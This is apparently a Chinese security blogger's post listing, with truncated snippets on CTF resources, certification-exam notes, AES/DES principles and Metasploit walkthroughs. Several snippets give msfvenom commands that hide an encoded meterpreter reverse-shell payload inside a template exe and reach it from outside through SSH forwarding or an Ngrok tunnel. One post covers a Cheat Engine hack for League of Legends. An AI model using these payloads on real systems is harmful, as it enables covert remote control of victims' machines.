![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
信息安全
reverse&pwn
要勇敢,要善良,要像星星一样闪闪发光
展开
-
收集的常用的CTF学习资源网站
http://www.sec-wiki.com/skill/ 安全技能学习路线(迷茫就看它)https://wiki.x10sec.org/ 介绍了CTF各个方向的基础知识 逆...转载 2020-08-05 20:18:09 · 3338 阅读 · 0 评论 -
CE实现LOL无限视距
一、CE下载及汉化工具:CE(CheatEngine)官方下载地址:https://www.cheatengine.org/index.php汉化:下载官方汉化包,选择Downloads --> Chinese Simplifled translation files(ch_CN)下载下来的是一个zip压缩文件,将此压缩文件解压到 /Cheat Engine/language...原创 2020-04-09 18:52:45 · 3644 阅读 · 0 评论 -
软考信息安全工程师笔记(第二章--密码学基础与应用)
1. 密码学基本概念1.1 密码学的基本安全目标密码学作为信息安全的关键技术,其安全且标主要包括三个非常重要的方面,保密性(confidentiality)、完整性(integrity) 和可用性(availability)保密性是确保信息仅被合法用户访问,而不被泄路给非授权的用户、实体或过程, 或供其利用的特性。即防止信息泄漏给非授权个人或实体,信息只为授权用户使用的特 性。这里的“...原创 2020-03-30 22:42:27 · 3817 阅读 · 0 评论 -
软考信息安全工程师笔记(第一章--信息安全基础)
目录1. 信息安全概念2. 信息安全法律法规3 信息安全管理基础1. 信息安全概念Cyberspace:指由计算机创建的虚拟信息空间,是信息环境中的一个全球域,由独立且互相依存的IT基础设施和网络组成,包括互联网、电信网、计算机系统、嵌入式处理器和控制器。传统的信息安全强调信息(数据)本身的安全属性,认为信息安全主要包括:信息的秘密性:不被未授权者知晓...原创 2020-03-28 00:02:06 · 684 阅读 · 0 评论 -
metasploit实现payload在外网中连接(续)
本文,通过一台目标能正常访问的云服务器,用ssh做端口转发,最终和目标保持持续通信。工具:云服务器(IP:yunip, PORT:yunport)Metasploit (IP:localip, PORT:localport)sshwindows靶机生成payloadmsfvenom -x model.exe -p windows/meterpreter/rever...原创 2020-03-27 15:19:57 · 241 阅读 · 0 评论 -
kali杂记
记一下笔记 ######## # ################# # ###################### # ################...原创 2020-03-25 22:33:04 · 257 阅读 · 0 评论 -
metasploit杂记
记性不太好,太久不用就忘了,懒得到时候去查,索性现在把单独的攻击流程记下来。。。生成payload:msfvenom -x model.exe -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.x.x LPORT=xxxx -f exe >payload.exemsfvenom ...原创 2020-03-20 13:37:10 · 138 阅读 · 0 评论 -
AES加密算法原理
AES(Advanced Encryption Standard)密码学中的高级加密标准,又称Rijndael加密法,是美国联邦政府采用的一种区块加密标准。该算法为比利时密码学家Joan Daemen和Vincent Rijmen所设计,结合两位作者的名字,以Rijdael之名命之。特点:针对差分分析和线性分析而提出来的 具有128位数据分组长度和可变密钥长度128、192、256位 ...原创 2020-02-04 02:06:28 · 1745 阅读 · 0 评论 -
DES加密算法原理
DES(Data Encryption Standard):数据加密标准。美国国家标准局(NBS),即现在的国家标准与技术研究所(NIST)于1973年5月向社会公开征集标准加密算法,1974年8月27日,NBS开始第二次征集,IBM提交了由Feistel团队研究开发的采用64位分组和128位密钥的LUCIFER算法,IBM用改版的LUCIFER参加竞争,最终获胜,成为数据加密标准DES。1976...原创 2020-01-30 01:14:01 · 1857 阅读 · 0 评论 -
metasploit实现payload在外网中连接
网上大多数metasploit教程均在内网环境下完成,而内网IP和公网IP完全不一样,公网IP由网络提供商为我们动态分配,也就意味着目标离开了局域网,我们就无法查找渗透目标。本次测试使用了Sunny-Ngrok内网穿透工具,这就使得目标主机上的反射型木马能够通过隧道连接到我们的主机,来达到稳定控制的效果。本次测试使用的靶机为Windows机器,攻击主机为kali Linux机器。一、...原创 2020-01-24 23:42:52 · 1042 阅读 · 0 评论